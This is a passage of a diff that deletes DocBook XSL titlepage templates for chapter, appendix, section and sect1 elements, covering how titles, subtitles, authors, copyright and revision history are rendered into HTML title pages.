-    </xsl:when>
-    <xsl:when test="info/title">
-      <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/title"/>
-    </xsl:when>
-    <xsl:when test="title">
-      <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="title"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:choose>
-    <xsl:when test="chapterinfo/subtitle">
-      <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="docinfo/subtitle">
-      <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="info/subtitle">
-      <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="subtitle">
-      <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="subtitle"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/corpauthor"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/corpauthor"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/corpauthor"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/authorgroup"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/authorgroup"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/authorgroup"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/author"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/author"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/author"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/othercredit"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/othercredit"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/othercredit"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/releaseinfo"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/releaseinfo"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/releaseinfo"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/copyright"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/copyright"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/copyright"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/legalnotice"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/legalnotice"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/legalnotice"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/pubdate"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/pubdate"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/pubdate"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/revision"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/revision"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/revision"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/revhistory"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/revhistory"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/revhistory"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/abstract"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/abstract"/>
-  <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="chapter.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="chapter.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="chapter.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="chapter.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="chapter.titlepage">
-  <div class="titlepage">
-    <xsl:variable name="recto.content">
-      <xsl:call-template name="chapter.titlepage.before.recto"/>
-      <xsl:call-template name="chapter.titlepage.recto"/>
-    </xsl:variable>
-    <xsl:variable name="recto.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$recto.content"/></div>
-    </xsl:if>
-    <xsl:variable name="verso.content">
-      <xsl:call-template name="chapter.titlepage.before.verso"/>
-      <xsl:call-template name="chapter.titlepage.verso"/>
-    </xsl:variable>
-    <xsl:variable name="verso.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$verso.content"/></div>
-    </xsl:if>
-    <xsl:call-template name="chapter.titlepage.separator"/>
-  </div>
-</xsl:template>
-
-<xsl:template match="*" mode="chapter.titlepage.recto.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="chapter.titlepage.verso.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="chapter.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="chapter.titlepage.recto.style">
-<xsl:apply-templates select="." mode="chapter.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="appendix.titlepage.recto">
-  <xsl:choose>
-    <xsl:when test="appendixinfo/title">
-      <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/title"/>
-    </xsl:when>
-    <xsl:when test="docinfo/title">
-      <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/title"/>
-    </xsl:when>
-    <xsl:when test="info/title">
-      <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/title"/>
-    </xsl:when>
-    <xsl:when test="title">
-      <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="title"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:choose>
-    <xsl:when test="appendixinfo/subtitle">
-      <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="docinfo/subtitle">
-      <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="info/subtitle">
-      <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="subtitle">
-      <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="subtitle"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/corpauthor"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/corpauthor"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/corpauthor"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/authorgroup"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/authorgroup"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/authorgroup"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/author"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/author"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/author"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/othercredit"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/othercredit"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/othercredit"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/releaseinfo"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/releaseinfo"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/releaseinfo"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/copyright"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/copyright"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/copyright"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/legalnotice"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/legalnotice"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/legalnotice"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/pubdate"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/pubdate"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/pubdate"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/revision"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/revision"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/revision"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/revhistory"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/revhistory"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/revhistory"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="appendixinfo/abstract"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="docinfo/abstract"/>
-  <xsl:apply-templates mode="appendix.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="appendix.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="appendix.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="appendix.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="appendix.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="appendix.titlepage">
-  <div class="titlepage">
-    <xsl:variable name="recto.content">
-      <xsl:call-template name="appendix.titlepage.before.recto"/>
-      <xsl:call-template name="appendix.titlepage.recto"/>
-    </xsl:variable>
-    <xsl:variable name="recto.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$recto.content"/></div>
-    </xsl:if>
-    <xsl:variable name="verso.content">
-      <xsl:call-template name="appendix.titlepage.before.verso"/>
-      <xsl:call-template name="appendix.titlepage.verso"/>
-    </xsl:variable>
-    <xsl:variable name="verso.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$verso.content"/></div>
-    </xsl:if>
-    <xsl:call-template name="appendix.titlepage.separator"/>
-  </div>
-</xsl:template>
-
-<xsl:template match="*" mode="appendix.titlepage.recto.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="appendix.titlepage.verso.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="appendix.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="appendix.titlepage.recto.style">
-<xsl:apply-templates select="." mode="appendix.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="section.titlepage.recto">
-  <xsl:choose>
-    <xsl:when test="sectioninfo/title">
-      <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/title"/>
-    </xsl:when>
-    <xsl:when test="info/title">
-      <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/title"/>
-    </xsl:when>
-    <xsl:when test="title">
-      <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="title"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:choose>
-    <xsl:when test="sectioninfo/subtitle">
-      <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/subtitle"/>
-    </xsl:when>
-    <xsl:when test="info/subtitle">
-      <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="subtitle">
-      <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="subtitle"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/corpauthor"/>
-  <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/corpauthor"/>
-  <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/authorgroup"/>
-  <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/authorgroup"/>
-  <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/author"/>
-  <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/author"/>
-  <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/othercredit"/>
-  <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/othercredit"/>
-  <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/releaseinfo"/>
-  <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/releaseinfo"/>
-  <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/copyright"/>
-  <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/copyright"/>
-  <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/legalnotice"/>
-  <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/legalnotice"/>
-  <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/pubdate"/>
-  <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/pubdate"/>
-  <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/revision"/>
-  <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/revision"/>
-  <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/revhistory"/>
-  <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/revhistory"/>
-  <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/abstract"/>
-  <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="section.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="section.titlepage.separator"><xsl:if test="count(parent::*)='0'"><hr/></xsl:if>
-</xsl:template>
-
-<xsl:template name="section.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="section.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="section.titlepage">
-  <div class="titlepage">
-    <xsl:variable name="recto.content">
-      <xsl:call-template name="section.titlepage.before.recto"/>
-      <xsl:call-template name="section.titlepage.recto"/>
-    </xsl:variable>
-    <xsl:variable name="recto.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$recto.content"/></div>
-    </xsl:if>
-    <xsl:variable name="verso.content">
-      <xsl:call-template name="section.titlepage.before.verso"/>
-      <xsl:call-template name="section.titlepage.verso"/>
-    </xsl:variable>
-    <xsl:variable name="verso.elements.count">
-      <xsl:choose>
-        <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
-          <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
-      <div><xsl:copy-of select="$verso.content"/></div>
-    </xsl:if>
-    <xsl:call-template name="section.titlepage.separator"/>
-  </div>
-</xsl:template>
-
-<xsl:template match="*" mode="section.titlepage.recto.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="section.titlepage.verso.mode">
-  <!-- if an element isn't found in this mode, -->
-  <!-- try the generic titlepage.mode -->
-  <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="sect1.titlepage.recto">
-  <xsl:choose>
-    <xsl:when test="sect1info/title">
-      <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/title"/>
-    </xsl:when>
-    <xsl:when test="info/title">
-      <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/title"/>
-    </xsl:when>
-    <xsl:when test="title">
-      <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="title"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:choose>
-    <xsl:when test="sect1info/subtitle">
-      <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="info/subtitle">
-      <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/subtitle"/>
-    </xsl:when>
-    <xsl:when test="subtitle">
-      <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="subtitle"/>
-    </xsl:when>
-  </xsl:choose>
-
-  <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/corpauthor"/>
-  <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/corpauthor"/>
-  <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/authorgroup"/>
-  <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/authorgroup"/>
-  <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/author"/>
-  <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/author"/>
-  <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/othercredit"/>
-  <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/othercredit"/>
-  <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/releaseinfo"/>
-  <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/releaseinfo"/>
-  <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/copyright"/>
